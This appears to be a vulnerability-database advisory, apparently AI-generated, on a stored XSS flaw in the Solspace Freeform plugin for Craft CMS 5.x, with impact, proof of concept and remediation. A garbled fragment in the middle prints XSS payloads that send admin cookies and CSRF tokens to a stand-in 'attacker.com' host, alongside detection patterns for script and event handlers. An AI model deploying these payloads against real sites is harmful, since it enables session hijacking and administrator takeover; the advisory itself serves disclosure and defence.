
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-26188 is a stored Cross-Site Scripting (XSS) vulnerability in the Solspace Freeform plugin for Craft CMS 5.x. An authenticated, low-privilege user with form creation or editing permissions can inject arbitrary HTML and JavaScript into the Craft Control Panel (CP) builder and integrations views, which then executes in the browser of any administrator who views those screens. The vulnerability affects all Freeform 5.x versions from 5.0.0 through 5.14.6, and was fixed in version 5.14.7 released January 28, 2026. It carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, Feedly).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the use of React's dangerouslySetInnerHTML to render user-controlled strings — including field labels, section labels, integration icons, short names, and WYSIWYG previews — without any sanitization (GitHub Advisory). The vulnerable code is present in the bundled CP JavaScript at packages/plugin/src/Resources/js/client/client.js. An attacker with low-privilege access (e.g., a form editor role) crafts a malicious payload in a form field label or integration metadata field; the payload is stored server-side and executes in the admin's browser when the builder or integrations view is loaded. Exploitation requires network access to the Craft CP and a valid low-privilege account, plus passive interaction from an administrator viewing the affected screens.
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of an administrator's browser session within the Craft Control Panel. This can lead to session and CSRF token theft, enabling full administrative account takeover, unauthorized modification of plugin configurations, and potential further compromise of the Craft CMS installation (GitHub Advisory). Because the payload is stored persistently, it executes every time any admin views the affected builder or integration screens, amplifying the risk beyond a single exploitation event.
A proof-of-concept (PoC) is publicly documented in the GitHub Security Advisory, including two specific payloads: injecting <script>alert('xss')</script> as a field label and setting an integration icon SVG to <svg onload=alert('xss-icon')> (GitHub Advisory). There is no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.044% (0.000440), indicating low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
<script>alert(document.cookie)</script> or <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.<svg onload="fetch('https://attacker.com/?token='+document.querySelector('[name=CRAFT_CSRF_TOKEN]').value)"> to capture CSRF tokens.<script>, onerror=, onload=, javascript:, or other event handler patterns.Upgrade the Solspace Freeform plugin to version 5.14.7 or later, which resolves the stored XSS vulnerabilities by sanitizing user-controlled strings before rendering (GitHub Release, GitHub Commit). As an interim workaround prior to patching, restrict form creation and editing permissions exclusively to trusted administrators, eliminating the low-privilege attack surface (GitHub Advisory). Additionally, implementing a Content Security Policy (CSP) that disallows inline scripts provides defense-in-depth, and reviewing access logs for suspicious form or integration modifications by low-privilege users is recommended.
The vulnerability was discovered and reported by security researcher Pr4v33N-Sec (LinkedIn: praveenkavinda), who is credited in the official GitHub Security Advisory (GitHub Advisory). The advisory was published by the Solspace maintainer team on January 22, 2026, with a patch released on January 28, 2026. Coverage has appeared on security aggregation sites including Vulners, INCIBE-CERT, and radar.offseq.com, reflecting routine community tracking of the disclosure.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."